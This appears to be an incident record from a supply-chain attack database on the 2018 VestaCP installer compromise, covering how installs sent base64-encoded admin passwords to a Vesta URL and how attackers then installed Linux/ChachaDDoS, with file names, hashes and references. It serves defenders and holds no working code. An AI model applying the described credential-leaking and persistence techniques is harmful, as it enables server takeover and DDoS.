Open Source 2018-05-31 · 13 days ·Credential Theft, Data Exfiltration, Ddos, Remote Code Execution

VestaCP installer leaked admin passwords

VestaCP's official installer leaked admin passwords and server domains to Vesta infrastructure. Attackers later used that access path to install Linux/ChachaDDoS on customer servers.

Story

VestaCP's installer carried malicious code in 2018. The change appeared in commit a3f0fa1 on May 31 and was removed in commit ee03eff on June 13. During that window, new installations exposed the base64-encoded admin password and server domain through the normal install path.

The leak was quiet because it used Vesta's own infrastructure. ESET traced the relevant line to vst-install-ubuntu.sh, where $codename contained the password and host name sent to http://vestacp.com/notify/. A VestaCP team member later said their infrastructure server had been hacked, likely through an API bug in release 0.9.8-20, and that attackers changed installation scripts to log admin passwords and IP addresses.

The impact surfaced months later. Forum users reported VestaCP servers being used for abnormal bandwidth and outbound attacks. One September report showed an attacker using the admin password over SSH to run creator-x86_64-1 from /var/tmp and erase auth logs. Vesta told users to change admin passwords and check for /usr/bin/dhcprenew.

ESET analyzed the malware as Linux/ChachaDDoS. It persisted as dhcprenew, hid as [kworker/1:1], downloaded architecture-specific second stages, decrypted them with ChaCha, and ran Lua tasks. Observed tasks performed SYN DDoS attacks. The supply-chain failure was the credential leak; the botnet was the consequence.

Affected Artifacts

VestaCP

shell script · vestacp.com · repository · Installer Script

Observed: 2018-05-31 to 2018-06-13
Compromised Versions: Unknown
Fixed: Not listed
Hashes: sha256:b9f1ffcbaf887c8ec4eb260ae1fdc25b07f4849d194388eee0707f9bf23c1bca

md5:35e9334ae8aef10c4a97e7cc90ff964d
Evidence: distribution: vestacp.com/pub/vst-install.sh, distribution: vestacp.com/pub/vst-install-debian.sh, mirror: welivesecurity.com/2018/10/18/new-linux-chachaddos-malware-distributed-servers-vestacp-installed, mirror: github.com/serghey-rodin/vesta/issues/1499 , +30 more

CVE-2018-25117 and VulnCheck describe affected scope as VestaCP commit a3f0fa1 through commit ee03eff.
VestaCP 0.9.8-23 was released in October 2018 to address security flaws found during the later incident response.

Incident Context

Motive: Botnet Ddos
Attribution: Group
Cause: Compromised Infrastructure
Transitive: No
Actor: Cybercriminal Gang

External References

VestaCP compromised in a new supply-chain attackwelivesecurity.com
All VestaCP installations being attacked - Page 4forum.vestacp.com
All VestaCP installations being attacked - Page 19forum.vestacp.com
Two servers are hacked today via Vestacpforum.vestacp.com
VestaCP April 2018 attack discussionforum.vestacp.com
VestaCP commit adding compromised installer behaviorgithub.com
VestaCP commit removing compromised installer behaviorgithub.com
CVE-2018-25117 VestaCP Debian Installer Malicious Backdoor Supply Chain Compromisecvedetails.com
CVE-2018-25117 Detailnvd.nist.gov
VestaCP Debian Installer Malicious Backdoor Supply Chain Compromisevulncheck.com
Vesta control panel servers infected with DDoS malware after supply chain attackhackread.com
Vesta control panel servers infected with DDoS malware after supply chain attackdebuglies.com
openSUSE docs VestaCP reference updategithub.com
The Value of a Hacked Email Accountkrebsonsecurity.com

Source record: oss/attacks/vestacp/meta.yaml